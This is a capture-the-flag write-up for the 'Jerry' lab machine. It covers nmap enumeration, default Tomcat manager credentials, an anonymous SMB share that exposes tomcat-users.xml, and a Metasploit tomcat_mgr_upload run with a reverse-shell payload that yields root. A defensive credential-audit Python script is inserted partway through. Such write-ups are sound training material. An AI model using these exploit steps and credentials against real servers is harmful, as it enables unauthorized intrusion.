Jerry

Personal Rating: Very Easy

Enumeration

An nmap scan on port 8080 reveals a web server:

nmap -p 8080 -O -sV <IP>

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|Vista|2008|7 (90%)

Apache Tomcat 7.0.88

Default Creds & Anonymous SMB Login

The credentials admin:admin worked here: http://<TARGETIP>:8080/manager/status

A general nmap scan revealed an SMB port, and anonymous login was possible; this can be done with smbclient, cme or other tools.

sudo nmap -sC <IP>

This file could be obtained:

$CATALINA_HOME/conf/tomcat-users.xml

I could log in at http://<TARGETIP>:8080/manager/html with tomcat:s3cret, found in the XML file.
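The root cause on this box is a tomcat-users.xml that hands a manager role to a sample credential and is readable by anyone. The following added audit script (not part of the original write-up, and not the box's real file) parses a constructed tomcat-users.xml in the layout of the stock Tomcat one and reports every account holding a Manager/Host Manager role, flagging default or weak passwords; the credential list and the 12-character minimum are assumptions for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of a shipped tomcat-users.xml; not the box's real file.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="admin" password="admin" roles="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="ops" password="Summer2018" roles="manager-script"/>
  <user username="deploy" password="9f!Qw-Lp3z#Vt8rM-c2" roles="manager-script"/>
  <user username="reader" password="reader" roles="probe"/>
</tomcat-users>
"""

# Hypothetical short list of sample/default pairs that are often left in place.
KNOWN_DEFAULTS = {("admin", "admin"), ("tomcat", "tomcat"), ("tomcat", "s3cret")}
# Roles that grant access to the Manager or Host Manager apps (deploying a WAR = code execution).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumed policy value for this example


def local_name(tag):
    """Strip the XML namespace, e.g. '{http://tomcat.apache.org/xml}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return {username: [issue, ...]} for every account that holds a privileged role."""
    findings = {}
    for elem in ET.fromstring(xml_text).iter():
        if local_name(elem.tag) != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # accounts without manager/admin roles are out of scope here
        issues = []
        if (name, password) in KNOWN_DEFAULTS:
            issues.append("default/sample credential")
        elif password == name or len(password) < MIN_PASSWORD_LEN:
            issues.append("weak password")
        issues.append("privileged roles: " + ", ".join(privileged))
        findings[name] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_tomcat_users(SAMPLE_TOMCAT_USERS).items():
        print(f"{user}: {'; '.join(issues)}")
```

Run it against a real $CATALINA_HOME/conf/tomcat-users.xml (and check that file's permissions and any SMB share exposing it) to catch exactly the misconfiguration this box relies on.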

Tomcat Privilege Escalation

Further scans and a search in msfconsole pointed to an authenticated exploit that works for this specific Tomcat version.

msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
HttpPassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/http/tomcat_mgr_upload) > run

This gave me a shell with root permissions. If you did not want to use Metasploit, you could of course have enumerated the web page manually to find the version and used an exploit script found with searchsploit, for example.